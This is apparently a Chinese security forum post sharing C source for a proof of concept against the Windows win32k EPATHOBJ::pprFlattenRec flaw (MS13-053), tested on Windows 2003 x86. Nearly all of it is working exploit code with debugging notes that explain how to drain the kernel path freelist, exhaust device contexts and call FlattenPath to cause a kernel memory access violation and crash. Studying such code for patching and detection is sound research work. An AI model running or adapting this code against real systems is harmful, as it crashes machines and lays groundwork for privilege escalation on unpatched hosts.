[原创]EPATHOBJ 稳定poc
具体调试见这里
http://www.binvul.com/redirect.php?tid=333
/*
* windows EPATHOBJ::pprFlattenRec bug poc by boywhp@126.com
* tested in windows 2003 x86
* THX -> http://www.vupen.com/blog/20130723.Advanced_Exploitation_Windows_Kernel_Win32k_EoP_MS13-053.php
*/
#include <stdlib.h>
#include <stdio.h>
#include <STDARG.H>
#include <stddef.h>
#include <windows.h>
#include <Shellapi.h>
#pragma comment(lib, "gdi32")
#pragma comment(lib, "kernel32")
#pragma comment(lib, "user32")
/* Size of the shared point buffers: 64 paths of 498 points each, which the
 * original author annotates as "64 * 4k". Filled once by main(). */
#define MAX_POLYPOINTS (64*498) //64 * 4k

// Path-record flag bits, copied from winddi.h in the DDK. Kept for reference;
// nothing in this file reads them.
#define PD_BEGINSUBPATH 0x00000001
#define PD_ENDSUBPATH 0x00000002
#define PD_RESETSTYLE 0x00000004
#define PD_CLOSEFIGURE 0x00000008
#define PD_BEZIERS 0x00000010
#define ENABLE_SWITCH_DESKTOP 1

/* Two-ULONG point, mirroring the DDK's POINTFIX layout. Declared but not used
 * by the code in this file. */
typedef struct _POINTFIX {
    ULONG x;
    ULONG y;
} POINTFIX, *PPOINTFIX;

/* Coordinates and per-point PT_* type codes handed to PolyDraw(). */
POINT Points[MAX_POLYPOINTS];
BYTE PointTypes[MAX_POLYPOINTS];
int main(int argc, char **argv)
{
    /*
     * Proof of concept for the EPATHOBJ::pprFlattenRec bug named in the file
     * header (the VUPEN write-up linked there is for MS13-053 and discusses
     * the EoP; this program only drives the crash). The header says it was
     * tested on Windows 2003 x86. Per the debugging notes below, the expected
     * outcome is a kernel memory access violation on the FlattenPath calls,
     * i.e. the machine bugchecks. The intended mitigation is the MS13-053
     * update. argc/argv are unused.
     */
    HDC expDev, tmpDc = NULL;
    ULONG i;

    /* Screen DC for the current desktop; it is never released. */
    expDev = GetDC(NULL);

    /* Fill every point with the marker values 0x41414141 / 0x42424242 (the
     * same values that appear, shifted, in the memory dump below) and mark
     * all of them as Bezier control points. */
    for (i = 0; i < MAX_POLYPOINTS; i++) {
        Points[i].x = 0x41414141;
        Points[i].y = 0x42424242;
        PointTypes[i] = PT_BEZIERTO;
    }

    /* MAX_PT_NUM = e194dfb8 - e194d028 = f90/sizeof(PT) = 1F2 = 498
    e194d008 e199d008 e194dfbc 00000fc0 e199d014 e199d008->prev alloc e194dfbc->freestart 00000fc0 total_size
    e194d018 00000000 00000011 000001f3 00000000
    e194d028 00000000 14141410 24242420 14141410
    e194d038 24242420 14141410 24242420 14141410
    ...
    e194dfa8 24242420 14141410 24242420 14141410
    e194dfb8 24242420 00000000 00000000 00000000
    * Debugging notes:
    * 1 First use 498*4 to empty the system freelist; <- my VM had 3 nodes on it initially
    * 2 The second PolyDraw uses a few fewer nodes (must be > 8), so that room for a few PTs is freed up
    * 3 FlattenPath
    * First call to EPATHOBJ::newpathrec (*pcMax = e > 8, win32k!newpathalloc is not called)
    directly returns a pointer into the 0x414141 0x42424242 memory region
    Second call EPATHOBJ::newpathrec->win32k!newpathalloc, freelist=NULL at this point, calls win32k!PALLOCMEM
    If the allocation fails here, or it is changed to NULL by hand in windbg,
    the newly created newpathrec has already been inserted into EPath->ppath->pprfist but newpathrec->next = 0x41414140
    4 FlattenPath
    memory access violation!!!
    */

    /* Steps 1 and 2 of the notes: one path of 498 points (the 0x1f2 maximum
     * from the dump), then one 15 points shorter. */
    BeginPath(expDev);
    PolyDraw(expDev, Points, PointTypes, 498);
    EndPath(expDev);
    BeginPath(expDev);
    PolyDraw(expDev, Points, PointTypes, 498-15);
    EndPath(expDev);

    /* Every DC created here is left open (no EndPath, no DeleteDC) and the
     * GetDC(NULL) handle passed in is never released, so this loop only stops
     * once CreateCompatibleDC itself returns NULL. Presumably this is meant to
     * drive the allocation in step 3 of the notes to failure -- confirm. The
     * assignment inside the condition is intentional. */
    while (tmpDc = CreateCompatibleDC(GetDC(NULL))) {
        BeginPath(tmpDc);
        /* 498*64 == MAX_POLYPOINTS, i.e. the whole Points array. */
        if (!PolyDraw(tmpDc, Points, PointTypes, 498*64)){
            /* Once the full-size PolyDraw fails, retry with progressively
             * smaller paths; each success runs steps 3/4 of the notes by
             * flattening the original path twice. */
            for (i=63; i>0; i--){
                BeginPath(tmpDc);
                if (PolyDraw(tmpDc, Points, PointTypes, 498*i)){
                    /* NOTE(review): i is ULONG, so %d is a format mismatch;
                     * %lu would match the argument type. */
                    printf("start poc %d...\n", i);
                    FlattenPath(expDev);
                    FlattenPath(expDev);
                }
            }
        }
    }
    return 0;
}